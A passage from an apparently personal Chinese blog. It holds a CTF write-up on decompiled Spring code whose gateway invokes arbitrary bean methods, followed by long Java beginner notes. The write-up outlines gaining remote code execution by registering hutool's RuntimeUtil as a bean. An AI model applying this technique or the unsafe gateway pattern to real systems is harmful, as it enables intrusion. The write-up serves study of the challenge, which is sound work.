getApplicationContextNoEx() {        return applicationContext;    }    public static  T getExistBean(String str) {        try {            return (T) getBean(str);        } catch (NoSuchBeanDefinitionException e) {            logger.error(e.getMessage());            return null;        }    }    public static  T getBean(String str) {        assertContextInjected();        return (T) applicationContext.getBean(str);    }    public static  T getBean(Class cls) {        assertContextInjected();        return (T) applicationContext.getBean(cls);    }    public static  T getBean(String str, Class cls) {        assertContextInjected();        return (T) applicationContext.getBean(str, cls);    }    public static  Map getBeansOfType(Class type) {        return applicationContext.getBeansOfType(type);    }    public static void clear() {        applicationContext = null;    }    private static void assertContextInjected() {        if (applicationContext == null) {            throw new IllegalStateException(">> in SpringContextHolder's ApplicationContext is null");        }    }}

// InvokeUtils.javapackage icu.Liki4.signin.util;import com.alibaba.fastjson2.JSON;import com.alibaba.fastjson2.JSONException;import com.alibaba.fastjson2.JSONReader;import com.alibaba.fastjson2.filter.Filter;import java.lang.reflect.Method;import java.util.Arrays;import java.util.Date;import java.util.List;import java.util.Map;import java.util.Objects;import java.util.Set;import java.util.stream.Collectors;import org.springframework.context.annotation.Lazy;public class InvokeUtils {    @Lazy    private static final Filter autoTypeFilter = JSONReader.autoTypeFilter((String[]) ((Set) Arrays.stream(SpringContextHolder.getApplicationContext().getBeanDefinitionNames()).map(name -> {        int secondDotIndex = name.indexOf(46, name.indexOf(46) + 1);        if (secondDotIndex != -1) {            return name.substring(0, secondDotIndex + 1);        }        return null;    }).filter((v0) -> {        return Objects.nonNull(v0);    }).collect(Collectors.toSet())).toArray(new String[0]));    public static Object invokeBeanMethod(String beanName, String methodName, Map params) throws Exception {        Object beanObject = SpringContextHolder.getBean(beanName);        Method beanMethod = (Method) Arrays.stream(beanObject.getClass().getMethods()).filter(method -> {            return method.getName().equals(methodName);        }).findFirst().orElse(null);        if (beanMethod.getParameterCount() == 0) {            return beanMethod.invoke(beanObject, new Object[0]);        }        String[] parameterTypes = new String[beanMethod.getParameterCount()];        Object[] parameterArgs = new Object[beanMethod.getParameterCount()];        for (int i = 0; i < beanMethod.getParameters().length; i++) {            Class parameterType = beanMethod.getParameterTypes()[i];            String parameterName = beanMethod.getParameters()[i].getName();            parameterTypes[i] = parameterType.getName();            if (!parameterType.isPrimitive() && !Date.class.equals(parameterType) && !Long.class.equals(parameterType) && !Integer.class.equals(parameterType) && !Boolean.class.equals(parameterType) && !Double.class.equals(parameterType) && !Float.class.equals(parameterType) && !Short.class.equals(parameterType) && !Byte.class.equals(parameterType) && !Character.class.equals(parameterType) && !String.class.equals(parameterType) && !List.class.equals(parameterType) && !Set.class.equals(parameterType) && !Map.class.equals(parameterType)) {                if (params.containsKey(parameterName)) {                    parameterArgs[i] = JSON.parseObject(JSON.toJSONString(params.get(parameterName)), (Class) parameterType, autoTypeFilter, new JSONReader.Feature[0]);                } else {                    try {                        parameterArgs[i] = JSON.parseObject(JSON.toJSONString(params), (Class) parameterType, autoTypeFilter, new JSONReader.Feature[0]);                    } catch (JSONException e) {                        for (Map.Entry entry : params.entrySet()) {                            Object value = entry.getValue();                            if ((value instanceof String) && ((String) value).contains("\"")) {                                params.put(entry.getKey(), JSON.parse((String) value));                            }                        }                        parameterArgs[i] = JSON.parseObject(JSON.toJSONString(params), (Class) parameterType, autoTypeFilter, new JSONReader.Feature[0]);                    }                }            } else {                parameterArgs[i] = params.getOrDefault(parameterName, null);            }        }        return beanMethod.invoke(beanObject, parameterArgs);    }}

// APIGatewayController.javapackage icu.Liki4.signin.controller;import ch.qos.logback.classic.encoder.JsonEncoder;import cn.hutool.core.util.StrUtil;import com.alibaba.fastjson2.JSON;import icu.Liki4.signin.base.BaseResponse;import icu.Liki4.signin.util.InvokeUtils;import jakarta.servlet.http.HttpServletRequest;import java.util.Map;import java.util.Objects;import org.apache.commons.io.IOUtils;import org.springframework.stereotype.Controller;import org.springframework.web.bind.annotation.RequestMapping;import org.springframework.web.bind.annotation.RequestMethod;import org.springframework.web.bind.annotation.ResponseBody;@RequestMapping({"/api"})@Controller/* loaded from: SigninJava.jar:BOOT-INF/classes/icu/Liki4/signin/controller/APIGatewayController.class */public class APIGatewayController {    @RequestMapping(value = {"/gateway"}, method = {RequestMethod.POST})    @ResponseBody    public BaseResponse doPost(HttpServletRequest request) throws Exception {        try {            String body = IOUtils.toString(request.getReader());            Map map = (Map) JSON.parseObject(body, Map.class);            String beanName = (String) map.get("beanName");            String methodName = (String) map.get(JsonEncoder.METHOD_NAME_ATTR_NAME);            Map params = (Map) map.get("params");            if (StrUtil.containsAnyIgnoreCase(beanName, "flag")) {                return new BaseResponse(403, "flagTestService offline", null);            }            Object result = InvokeUtils.invokeBeanMethod(beanName, methodName, params);            return new BaseResponse(200, null, result);        } catch (Exception e) {            return new BaseResponse(500, ((Throwable) Objects.requireNonNullElse(e.getCause(), e)).getMessage(), null);        }    }}

在网上一查就能知道，得到bean的一个方案是调用ApplicationContext类实例的getBean()方法，那我们没法改源码，但可以通过调试直接获得ApplicationContext类对象的各种属性，也就很顺理成章地拿到已有的bean了。接下来的问题是怎么调试。
在协会时Liki4学长当场开课讲了用远程JVM调试，即在本地启动jar服务，用idea连上它，就可以在idea上调试(这个教程网上很多，不过多赘述了)。但是在真正尝试的时候才发现，这样调试只能断方法断点或者异常断点，这完全达不到我们的需求。问了学长才知道，反编译之后的源码的每一行必须和实际执行的每一行对应，才能正常调试jar。这里的问题是出在了jar包的依赖没有展开，导致出现行断点无法使用。
正确的调试方法步骤如下：

首先将jar包中的lib目录提取出来，放到一个项目目录中。将其设置为库(add as library)
再将jar包中的源码部分(这里是icu.Liki4.signin)反编译，放入项目目录。这里要将其识别为源代码根目录。
将jar包本身放入当前目录，可以直接右键它进行调试了。

终于可以正常地调试了！真是坎坷。
接着我们就要拿ApplicationContext，将断点断在SpringContextHolder.java中的第49行，我们就能拿到ApplicationContext类对象了，其中存在beanFactory，也就是bean存储的地方了，发现其中的beanDefinitionNames，就能得到所有已注册bean的名字了。
这里注意到(通过wp注意到QwQ)cn.hutool.extra.spring.SpringUtil这个bean，它存在一个registerBean方法:

也就是说，我们只要传入一个自定义的beanName，以及它的类型就可以动态注册一个恶意bean(比如注册cn.hutool.core.util.RuntimeUtil)来实现rce。

那么在我们传这个json的时候问题又出现了,传入看起来完全没问题的json，却会一直报错Bean name must not be null，这里其实并非BeanName出了问题，而是params的格式问题(有点小脑洞的)，我们在InvokeUtils.java的第43行下断点，就能发现parameterName被设定为了arg0，arg1的形式:

这是String parameterName = beanMethod.getParameters()[i].getName();所导致的，也就是我们希望执行的方法规定传入的参数名字就是arg0这样的形式。
到这里，总算是大功告成，能够成功的注册bean并且执行了。

#稍微总结一下

调试真是十分好的技巧捏。之后存在源码的话(尤其是Java这种经常可以动态修改的)，可以考虑调试来得到一些信息或者做到某些事情。

Java笔记

2025-02-27T14:36:42.000Z

抄录自廖雪峰的java教程

#入门

#Java程序基础

#基本结构

#类和方法

public class Hello {    public static void main(String[] args) {        // 向屏幕输出文本:        System.out.println("Hello, world!");        /* 多行注释开始        注释内容        注释结束 */    }}

因为Java是面向对象的语言，一个程序的基本单位就是class，class是关键字，这里定义的class名字就是Hello

类名要求：
必须以英文字母开头，后接字母，数字和下划线的组合
习惯以大写字母开头

public是访问修饰符，表示该class是公开的。不写public，也能正确编译，但是这个类将无法从命令行执行。public除了可以修饰class外，也可以修饰方法。

在class内部，可以定义若干方法。方法定义了一组执行语句，方法内部的代码将会被依次顺序执行。

方法名要求：
必须以英文字母开头，后接字母，数字和下划线的组合
习惯以小写字母开头

static是另一个修饰符，它表示静态方法(之后再议)。Java入口程序规定的方法必须是静态方法，方法名必须为main，括号内的参数必须是String数组。

#注释

Java有3种注释，第一种是单行注释，以双斜线开头，直到这一行的结尾结束：

// 这是注释...

而多行注释以/*星号开头，以*/结束，可以有多行：

/*这是注释blablabla...这也是注释*/

还有一种特殊的多行注释，以/**开头，以*/结束，如果有多行，每行通常以星号开头：

/** * 这种特殊的多行注释需要写在类和方法的定义处， * 可以用于自动创建文档。 *  */public class Hello {    public static void main(String[] args) {        System.out.println("Hello, world!");    }}

#变量和数据类型

#变量

在Java中，变量必须先定义后使用，在定义变量的时候，可以给它一个初始值。例如：

int x = 1;

#基本数据类型

基本数据类型是CPU可以直接进行运算的类型。Java定义了以下几种基本数据类型：

整数类型：byte，short，int，long
浮点数类型：float，double
字符类型：char
布尔类型：boolean

#整型

对于整型类型，Java只定义了带符号的整型，因此，最高位的bit表示符号位（0表示正数，1表示负数）。各种整型能表示的最大范围如下：

byte：-128 ~ 127
short: -32768 ~ 32767
int: -2147483648 ~ 2147483647
long: -9223372036854775808 ~ 9223372036854775807

不同进制数的表示：
16进制：0x
8进制：0
2进制：0b
例如： 15=0xf＝017=0b1111

#浮点型

浮点类型的数就是小数，因为小数用科学计数法表示的时候，小数点是可以“浮动”的，如1234.5可以表示成12.345e10^2^，也可以表示成1.2345e10^3^，所以称为浮点数。

下面是定义浮点数的例子：

float f1 = 3.14f;float f2 = 3.14e38f;double d = 1.79e308;double d2 = -1.79e308;double d3 = 4.9e-324;

对于float类型，需要加上f后缀。否则是double类型。

浮点数可表示的范围非常大，float类型可最大表示3.4x10^38^，而double类型可最大表示1.79x10^308^。

#布尔类型

布尔类型boolean只有true和false两个值，布尔类型总是关系运算的计算结果：

boolean b1 = true;boolean b2 = false;boolean isGreater = 5 > 3; // 计算结果为trueint age = 12;boolean isAdult = age >= 18; // 计算结果为false

Java语言对布尔类型的存储并没有做规定，因为理论上存储布尔类型只需要1 bit，但是通常JVM内部会把boolean表示为4字节整数。

#字符类型

字符类型char表示一个字符。Java的char类型除了可表示标准的ASCII外，还可以表示一个Unicode字符：

// 字符类型public class Main {    public static void main(String[] args) {        char a = 'A';        char zh = '中';        System.out.println(a);        System.out.println(zh);    }}

注意char类型使用单引号'，且仅有一个字符，要和双引号"的字符串类型区分开。

#引用类型

引用类型最常用的就是String字符串：

String s = "hello";

引用类型的变量类似于C语言的指针，它内部存储一个“地址”，指向某个对象在内存的位置。

#常量

定义变量的时候，如果加上final修饰符，这个变量就变成了常量：

final double PI = 3.14; // PI是一个常量double r = 5.0;double area = PI * r * r;PI = 300; // compile error!

常量在定义时进行初始化后就不可再次赋值，再次赋值会导致编译错误。

常量的作用是用有意义的变量名来避免魔术数字(拥有特殊意义的数字)，例如，不要在代码中到处写3.14，而是定义一个常量。

为了和变量区分开来，根据习惯，常量名通常全部大写。

#var关键字

如果想省略变量类型，可以使用var关键字：

var sb = new StringBuilder();

编译器会根据赋值语句自动推断出变量sb的类型是StringBuilder。

#运算

运算方面基本与C完全一致，仅记录一些特殊的点。

#浮点运算溢出

整数运算在除数为0时会报错，而浮点数运算在除数为0时，不会报错，但会返回几个特殊值：

NaN表示Not a Number
Infinity表示无穷大
-Infinity表示负无穷大

#字符和字符串

仅记录和C的不同之处

#字符串连接

Java的编译器对字符串做了特殊照顾，可以使用+连接任意字符串和其他数据类型，这样极大地方便了字符串的处理(和py一样)。

如果用+连接字符串和其他数据类型，会将其他数据类型先自动转型为字符串，再连接。

从Java 13开始，字符串可以用"""..."""表示多行字符串了(和py一样)。举个例子：

// 多行字符串public class Main {    public static void main(String[] args) {        String s = """                   SELECT * FROM                     users                   WHERE id > 100                   ORDER BY name DESC                   """;        System.out.println(s);    }}

#空值null

引用类型的变量可以指向一个空值null，它表示不存在，即该变量不指向任何对象。例如：

String s1 = null; // s1是nullString s2 = s1; // s2也是nullString s3 = ""; // s3指向空字符串，不是null

注意要区分空值null和空字符串""，空字符串是一个有效的字符串对象，它不等于null。

#数组

可以使用数组来表示“一组”int类型。代码如下：

// 数组public class Main {    public static void main(String[] args) {        // 5位同学的成绩:        int[] ns = new int[] { 68, 79, 91, 85, 62 };        //等同于int[] ns = { 68, 79, 91, 85, 62 };    }}

定义一个数组类型的变量，使用数组类型“类型[]”，例如，int[]。和单个基本类型变量不同，数组变量初始化必须使用new int[5]表示创建一个可容纳5个int元素的数组。

Java的数组有几个特点：

数组属于引用类型。
数组所有元素初始化为默认值，整型都是0，浮点型是0.0，布尔型是false；
数组一旦创建后，大小就不可改变。
要访问数组中的某一个元素，需要使用索引。数组索引从0开始。
可以修改数组中的某一个元素，使用赋值语句，例如，ns[1] = 79;。
可以用数组变量.length获取数组大小
数组是引用类型，在使用索引访问数组元素时，如果索引超出范围，运行时将报错
也可以在定义数组时直接指定初始化的元素，这样就不必写出数组大小，而是由编译器自动推算数组大小。

#流程控制

#输入和输出

#输出

在前面的代码中，我们总是使用System.out.println()来向屏幕输出一些内容。

println是print line的缩写，表示输出并换行。因此，如果输出后不想换行，可以用print()：

// 输出public class Main {    public static void main(String[] args) {        System.out.print("A,");        System.out.print("B,");        System.out.print("C.");        System.out.println();        System.out.println("END");    }}

#格式化输出

省流(?)：和C基本一致

如果要把数据显示成我们期望的格式，就需要使用格式化输出的功能。格式化输出使用System.out.printf()，通过使用占位符%?，printf()可以把后面的参数格式化成指定格式：

// 格式化输出public class Main {    public static void main(String[] args) {        double d = 3.1415926;        System.out.printf("%.2f\n", d); // 显示两位小数3.14        System.out.printf("%.4f\n", d); // 显示4位小数3.1416    }}

Java的格式化功能提供了多种占位符，可以把各种数据类型“格式化”成指定的字符串：

占位符	说明
%d	格式化输出整数
%x	格式化输出十六进制整数
%f	格式化输出浮点数
%e	格式化输出科学计数法表示的浮点数
%s	格式化字符串

注意，由于%表示占位符，因此，连续两个%%表示一个%字符本身。

#输入

和输出相比，Java的输入就要复杂得多。

我们先看一个从控制台读取一个字符串和一个整数的例子：

import java.util.Scanner;public class Main {    public static void main(String[] args) {        Scanner scanner = new Scanner(System.in);        // 创建Scanner对象        System.out.print("Input your name: ");         // 打印提示        String name = scanner.nextLine();         // 读取一行输入并获取字符串        System.out.print("Input your age: ");         // 打印提示        int age = scanner.nextInt();         // 读取一行输入并获取整数        System.out.printf("Hi, %s, you are %d\n", name, age);         // 格式化输出    }}

首先，我们通过import语句导入java.util.Scanner。

然后，创建Scanner对象并传入System.in。

System.out代表标准输出流，而System.in代表标准输入流。
直接使用System.in读取用户输入虽然是可以的，但需要更复杂的代码，而通过Scanner就可以简化后续的代码。

有了Scanner对象后，要读取用户输入的字符串，使用scanner.nextLine()；要读取用户输入的整数，使用scanner.nextInt()。Scanner会自动转换数据类型，因此不必手动转换。

要测试输入，必须从命令行读取用户输入，因此，需要走编译、执行的流程：

$ javac Main.java

执行：

$ java MainInput your name: Bob ◀── 输入 BobInput your age: 12   ◀── 输入 12Hi, Bob, you are 12  ◀── 输出

根据提示分别输入一个字符串和整数后，我们得到了格式化的输出。

#if条件判断

与C基本一致，仅记录不同之处

#判断引用类型相等

判断引用类型的变量是否相等，==表示“引用是否相等”，或者说，是否指向同一个对象。例如，下面的两个String类型，它们的内容是相同的，但是，分别指向不同的对象，用==判断，结果为false。

要判断引用类型的变量内容是否相等，必须使用equals()方法：

// 条件判断public class Main {    public static void main(String[] args) {        String s1 = "hello";        String s2 = "HELLO".toLowerCase();        System.out.println(s1);        System.out.println(s2);        if (s1.equals(s2)) {            System.out.println("s1 equals s2");        } else {            System.out.println("s1 not equals s2");        }    }}

注意：执行语句s1.equals(s2)时，如果变量s1为null，会报NullPointerException。要避免NullPointerException错误，可以利用短路运算符&&：

// 条件判断public class Main {    public static void main(String[] args) {        String s1 = null;        if (s1 != null && s1.equals("hello")) {            System.out.println("hello");        }    }}

#switch多重选择

仅记录Java 12后的新语法与yield。传统语法与C基本一致

#switch表达式

使用switch时，如果遗漏了break，就会造成严重的逻辑错误，而且不易在源代码中发现错误。从Java 12开始，switch语句升级为更简洁的表达式语法，保证只有一种路径会被执行，并且不需要break语句：

// switchpublic class Main {    public static void main(String[] args) {        String fruit = "apple";        switch (fruit) {        case "apple" -> System.out.println("Selected apple");        case "pear" -> System.out.println("Selected pear");        case "mango" -> {            System.out.println("Selected mango");            System.out.println("Good choice!");        }        default -> System.out.println("No fruit selected");        }    }}

注意新语法使用->，如果有多条语句，需要用{}括起来。不要写break语句，因为新语法只会执行匹配的语句，没有穿透效应。

#yield

如果需要复杂的语句，我们也可以写很多语句，放到{...}里，然后，用yield返回一个值作为switch语句的返回值：

// yieldpublic class Main {    public static void main(String[] args) {        String fruit = "orange";        int opt = switch (fruit) {            case "apple" -> 1;            case "pear", "mango" -> 2;            default -> {                int code = fruit.hashCode();                yield code; // switch语句返回值            }        };        System.out.println("opt = " + opt);    }}

#循环语句

仅记录部分和C不同的部分

#for each循环

Java提供了另一种for each循环，它可以更简单地遍历数组：

// for eachpublic class Main {    public static void main(String[] args) {        int[] ns = { 1, 4, 9, 16, 25 };        for (int n : ns) {            System.out.println(n);        }    }}

和for循环相比，for each循环的变量n不再是计数器，而是直接对应到数组的每个元素。for each循环的写法也更简洁。但是，for each循环无法指定遍历顺序，也无法获取数组的索引。

for each循环能够遍历所有“可迭代”的数据类型。

#数组操作

#遍历

除了用for循环遍历数组外，Java标准库还提供了Arrays.toString()，可以快速打印数组内容：

// 遍历数组import java.util.Arrays;public class Main {    public static void main(String[] args) {        int[] ns = { 1, 1, 2, 3, 5, 8 };        System.out.println(Arrays.toString(ns));    }}

#排序

Java的标准库已经内置了排序功能，我们只需要调用JDK提供的Arrays.sort()就可以排序(默认升序)：

// 排序import java.util.Arrays;public class Main {    public static void main(String[] args) {        int[] ns = { 28, 12, 89, 73, 65, 18, 96, 50, 8, 36 };        Arrays.sort(ns);        System.out.println(Arrays.toString(ns));    }}

#命令行参数

Java程序的入口是main方法，而main方法可以接受一个命令行参数，它是一个String[]数组。

这个命令行参数由JVM接收用户输入并传给main方法：

public class Main {    public static void main(String[] args) {        for (String arg : args) {            System.out.println(arg);        }    }}

我们可以利用接收到的命令行参数，根据不同的参数执行不同的代码。例如，实现一个-version参数，打印程序版本号：

public class Main {    public static void main(String[] args) {        for (String arg : args) {            if ("-version".equals(arg)) {                System.out.println("v 1.0");                break;            }        }    }}

上面这个程序必须在命令行执行，我们先编译它：

$ javac Main.java

然后，执行的时候，给它传递一个-version参数：

$ java Main -versionv 1.0

这样，程序就可以根据传入的命令行参数，作出不同的响应。

#面向对象

#面向对象基础

#方法

一个class可以包含多个field，例如，我们给Person类就定义了两个field：

class Person {    public String name;    public int age;}

显然，直接操作field，容易造成逻辑混乱。为了避免外部代码直接去访问field，我们可以用private修饰field，拒绝外部访问：

class Person {    private String name;    private int age;}

我们需要使用方法（method）来让外部代码可以间接修改field：

// private fieldpublic class Main {    public static void main(String[] args) {        Person ming = new Person();        ming.setName("Xiao Ming"); // 设置name        ming.setAge(12); // 设置age        System.out.println(ming.getName() + ", " + ming.getAge());    }}class Person {    private String name;    private int age;    public String getName() {        return this.name;    }    public void setName(String name) {        this.name = name;    }    public int getAge() {        return this.age;    }    public void setAge(int age) {        if (age < 0 || age > 100) {            throw new IllegalArgumentException("invalid age value");        }        this.age = age;    }}

虽然外部代码不能直接修改private字段，但是，外部代码可以调用方法setName()和setAge()来间接修改private字段。在方法内部，我们就有机会检查参数对不对。

一个类通过定义方法，就可以给外部代码暴露一些操作的接口，同时，内部自己保证逻辑一致性。

调用方法的语法是实例变量.方法名(参数);。

#定义方法

定义方法的语法是：

修饰符 方法返回类型 方法名(方法参数列表) {    若干方法语句;    return 方法返回值;}

#private方法

和private字段一样，private方法不允许外部调用，那我们定义private方法有什么用？

定义private方法的理由是内部方法是可以调用private方法的。

#this变量

在方法内部，可以使用一个隐含的变量this，它始终指向当前实例。因此，通过this.field就可以访问当前实例的字段。

#可变参数

可变参数用类型...定义，可变参数相当于数组类型：

class Group {    private String[] names;    public void setNames(String... names) {        this.names = names;    }}

上面的setNames()就定义了一个可变参数。调用时，可以这么写：

Group g = new Group();g.setNames("Xiao Ming", "Xiao Hong", "Xiao Jun"); // 传入3个Stringg.setNames("Xiao Ming", "Xiao Hong"); // 传入2个Stringg.setNames("Xiao Ming"); // 传入1个Stringg.setNames(); // 传入0个String

完全可以把可变参数改写为String[]类型：

class Group {    private String[] names;    public void setNames(String[] names) {        this.names = names;    }}

但是，调用方需要自己先构造String[]，比较麻烦。所以可以直接用...表达式。

#构造方法

创建实例的时候，实际上是通过构造方法来初始化实例的。我们先来定义一个构造方法，能在创建Person实例的时候，一次性传入name和age，完成初始化：

// 构造方法public class Main {    public static void main(String[] args) {        Person p = new Person("Xiao Ming", 15);        System.out.println(p.getName());        System.out.println(p.getAge());    }}class Person {    private String name;    private int age;    public Person(String name, int age) {        this.name = name;        this.age = age;    }        public String getName() {        return this.name;    }    public int getAge() {        return this.age;    }}

构造方法有以下特点：

构造方法的名称就是类名。
构造方法的参数没有限制，在方法内部，也可以编写任意语句。
构造方法没有返回值（也没有void）。
调用构造方法，必须用new操作符。创建实例的同时会调用构造方法。

#默认构造方法

果一个类没有定义构造方法，编译器会自动为我们生成一个默认构造方法，它没有参数，也没有执行语句，类似这样：

class Person {    public Person() {    }}

如果既要能使用带参数的构造方法，又想保留不带参数的构造方法，那么只能把两个构造方法都定义出来：

public Person() {}public Person(String name, int age) {    this.name = name;    this.age = age;}

没有在构造方法中初始化字段时，引用类型的字段默认是null，数值类型的字段用默认值，int类型默认值是0，布尔类型默认值是false。

当我们对字段进行初始化，又在构造方法中对字段进行初始化时，字段的值根据构造方法的代码确定。

#多个构造方法

可以定义多个构造方法，在通过new操作符调用的时候，编译器通过构造方法的参数数量、位置和类型自动区分(就像之前，定义一个没有参数，一个有参数的构造方法)。

#方法重载

在一个类中，我们可以定义多个方法。如果有一系列方法，它们的功能都是类似的，只有参数有所不同，那么，可以把这一组方法名做成同名方法。例如，在Hello类中，定义多个hello()方法：

class Hello {    public void hello() {        System.out.println("Hello, world!");    }    public void hello(String name) {        System.out.println("Hello, " + name + "!");    }    public void hello(String name, int age) {        if (age < 18) {            System.out.println("Hi, " + name + "!");        } else {            System.out.println("Hello, " + name + "!");        }    }}

这种方法名相同，但各自的参数不同，称为方法重载(Overload)。要注意方法重载的返回值类型通常都是相同的。方法重载的目的是，功能类似的方法使用同一名字，更容易记住，调用起来更简单。

例如，String类提供了多个重载方法indexOf()，可以查找子串：

int indexOf(int ch)：根据字符的Unicode码查找；
int indexOf(String str)：根据字符串查找；
int indexOf(int ch, int fromIndex)：根据字符查找，但指定起始位置；
int indexOf(String str, int fromIndex)根据字符串查找，但指定起始位置。

#继承

继承是面向对象编程中非常强大的一种机制，它首先可以复用代码。

Java使用extends关键字来实现继承：

class Person {    private String name;    private int age;    public String getName() {...}    public void setName(String name) {...}    public int getAge() {...}    public void setAge(int age) {...}}class Student extends Person {    // 不要重复name和age字段/方法,    // 只需要定义新增score字段/方法:    private int score;    public int getScore() { … }    public void setScore(int score) { … }}

可见，通过继承，Student只需要编写额外的功能，不再需要重复代码。

子类自动获得了父类的所有字段，严禁定义与父类重名的字段！

我们把被继承的类称为超类，父类，基类，把继承其他类的类称作其子类，扩展类。

#继承树

在Java中，没有明确写extends的类，编译器会自动加上extends Object。所以，任何类，除了Object，都会继承自某个类。

Java只允许一个class继承自一个类，因此，一个类有且仅有一个父类。只有Object特殊，它没有父类。

#protected

继承有个特点，就是子类无法访问父类的private字段或者private方法,这使得继承的作用被削弱了。

如果我们希望子类可以访问父类的字段，我们需要把private改为protected。protected关键字可以把字段和方法的访问权限控制在继承树内部，一个protected字段和方法可以被其子类，以及子类的子类所访问。

#super❀

super关键字表示父类（超类）。子类引用父类的字段时，可以用super.fieldName。例如：

class Student extends Person {    public String hello() {        return "Hello, " + super.name;    }}

实际上，这里使用super.name，或者this.name，或者name，效果都是一样的。编译器会自动定位到父类的name字段。

但是，在某些时候，就必须使用super。我们来看一个例子：

// superpublic class Main {    public static void main(String[] args) {        Student s = new Student("Xiao Ming", 12, 89);    }}class Person {    protected String name;    protected int age;    public Person(String name, int age) {        this.name = name;        this.age = age;    }}class Student extends Person {    protected int score;    public Student(String name, int age, int score) {        this.score = score;    }}

运行上面的代码，会得到一个编译错误，大意是在Student的构造方法中，无法调用Person的构造方法。

这是因为在Java中，任何class的构造方法，第一行语句必须是调用父类的构造方法。如果没有明确地调用父类的构造方法，*编译器会帮我们自动加一句super();*，所以，Student类的构造方法实际上是这样：

class Student extends Person {    protected int score;    public Student(String name, int age, int score) {        super(); // 自动调用父类的构造方法        this.score = score;    }}

但是，Person类并没有无参数的构造方法，因此，编译失败。

解决方法是调用Person类存在的某个构造方法。例如：

class Student extends Person {    protected int score;    public Student(String name, int age, int score) {        super(name, age); // 调用父类的构造方法Person(String, int)        this.score = score;    }}

这样就可以正常编译了！

本质地说，即子类不会继承任何父类的构造方法。子类默认的构造方法是编译器自动生成的，不是继承的。如果父类没有默认的构造方法，子类就必须显式调用super()并给出参数以便让编译器定位到父类的一个合适的构造方法。

比较好的解决方法就是在子类的构造方式里写super，这样也能明确需要继承的字段，同时不易产生报错。

#阻止继承

正常情况下，只要某个class没有final修饰符，那么任何类都可以从该class继承。

从Java 15开始，允许使用sealed修饰class，并通过permits明确写出能够从该class继承的子类名称。

例如，定义一个Shape类：

public sealed class Shape permits Rect, Circle, Triangle {    ...}

上述Shape类就是一个sealed类，它只允许指定的3个类继承它。

final：不允许继承该类。
sealed+permits：仅允许permits的类继承该类。

#向上转型

如果Student是从Person继承下来的，那么，一个引用类型为Person的变量能指向Student类型的实例。

Person p = new Student();

这是因为Student继承自Person，因此，它拥有Person的全部功能。Person类型的变量，如果指向Student类型的实例，对它进行操作，是没有问题的。

这种把一个子类类型安全地变为父类类型的赋值，被称为向上转型。

由此我们可以知道，引用变量的声明类型和实际类型可能是不一样的。

#向下转型

如果把一个父类类型强制转型为子类类型，就是向下转型。例如：

Person p1 = new Student(); // upcasting(向上转型), okPerson p2 = new Person();Student s1 = (Student) p1; // okStudent s2 = (Student) p2; // runtime error! ClassCastException!

把p2转型为Student会失败，因为p2的实际类型是Person，不能把父类变为子类，因为子类功能比父类多，多的功能无法凭空变出来。因此，向下转型很可能会失败。失败的时候，Java虚拟机会报ClassCastException。

为了避免向下转型出错，Java提供了instanceof操作符，可以先判断一个实例究竟是不是某种类型。instanceof实际上判断一个变量所指向的实例是否是指定类型，或者这个类型的子类。如果一个引用变量为null，那么对任何instanceof的判断都为false。

从Java 14开始，判断instanceof后，可以直接转型为指定变量，避免再次强制转型。例如，对于以下代码：

Object obj = "hello";if (obj instanceof String) {    String s = (String) obj;    System.out.println(s.toUpperCase());}

可以改写如下：

// instanceof variable:public class Main {    public static void main(String[] args) {        Object obj = "hello";        if (obj instanceof String s) {            // 可以直接使用变量s:            System.out.println(s.toUpperCase());        }    }}

这种使用instanceof的写法更加简洁。

#多态

#覆写与动态调用

在继承关系中，子类如果定义了一个与父类方法签名完全相同的方法，被称为覆写（Override）。

方法声明的两个组件构成了方法签名：方法的名称和参数类型。
例如，这里是一个典型的方法声明:
public double calculateAnswer(double wingSpan, int numberOfEngines,                           double length, double grossTons) { //do the calculation here}
上面方法的签名是:calculateAnswer(double, int, double, double)

例如，在Person类中，定义run()方法：

class Person {    public void run() {        System.out.println("Person.run");    }}

在子类Student中，覆写这个run()方法：

class Student extends Person {    @Override    public void run() {        System.out.println("Student.run");    }}

如果方法签名不同，就是Overload。Overload方法是一个新方法；如果方法签名相同，并且返回值也相同，就是Override。

加上@Override可以让编译器帮助检查是否进行了正确的覆写。希望进行覆写，但是不小心写错了方法签名，编译器会报错，但是@Override不是必需的。

在上一节中，我们已经知道，引用变量的声明类型可能与其实际类型不符，例如：

Person p = new Student();

现在，如果子类覆写了父类的方法：

// overridepublic class Main {    public static void main(String[] args) {        Person p = new Student();        p.run(); // 应该打印Person.run还是Student.run?    }}class Person {    public void run() {        System.out.println("Person.run");    }}class Student extends Person {    @Override    public void run() {        System.out.println("Student.run");    }}

那么，一个实际类型为Student，引用类型为Person的变量，调用其run()方法，调用的是Person还是Student的run()方法？

运行一下上面的代码就可以知道，实际上调用的方法是Student的run()方法。因此可得出结论：

Java的实例方法调用是基于运行时的实际类型的动态调用，而非变量的声明类型。

这个非常重要的特性在面向对象编程中称之为多态(Polymorphic)。

#多态

多态是指，针对某个类型的方法调用，其真正执行的方法取决于运行时期实际类型的方法。

多态的特性是运行期才能动态决定调用的子类方法。对某个类型调用某个方法，执行的实际方法可能是某个子类的覆写方法。这种不确定性的方法调用，究竟有什么作用？

假设我们定义一种收入，需要给它报税，那么先定义一个Income类。对于工资收入，可以减去一个基数，那么我们可以从Income派生出SalaryIncome，并覆写getTax()。如果你享受国务院特殊津贴，那么按照规定，可以全部免税：

现在，我们要编写一个报税的财务软件，对于一个人的所有收入进行报税。可以这么写：

public class Main {    public static void main(String[] args) {        // 给一个有普通收入、工资收入和享受国务院特殊津贴的小伙伴算税:        Income[] incomes = new Income[] {            new Income(3000),            new Salary(7500),            new StateCouncilSpecialAllowance(15000)        };        System.out.println(totalTax(incomes));    }    public static double totalTax(Income... incomes) {        double total = 0;        for (Income income: incomes) {            total = total + income.getTax();        }        return total;    }}class Income {    protected double income;    public Income(double income) {        this.income = income;    }    public double getTax() {        return income * 0.1; // 税率10%    }}class Salary extends Income { //仅工资税收时    public Salary(double income) {        super(income);    }    @Override    public double getTax() {        if (income <= 5000) {            return 0;        }        return (income - 5000) * 0.2;    }}class StateCouncilSpecialAllowance extends Income { //享受津贴时    public StateCouncilSpecialAllowance(double income) {        super(income);    }    @Override    public double getTax() {        return 0;    }}

利用多态，totalTax()方法只需要和Income打交道，它完全不需要知道Salary和StateCouncilSpecialAllowance的存在，就可以正确计算出总的税。如果我们要新增一种稿费收入，只需要从Income派生，然后正确覆写getTax()方法就可以。把新的类型传入totalTax()，不需要修改任何代码。

可见，多态具有一个非常强大的功能，就是允许添加更多类型的子类实现功能扩展，却不需要修改基于父类的代码。

#覆写Object方法

因为所有的class最终都继承自Object，而Object定义了几个重要的方法：

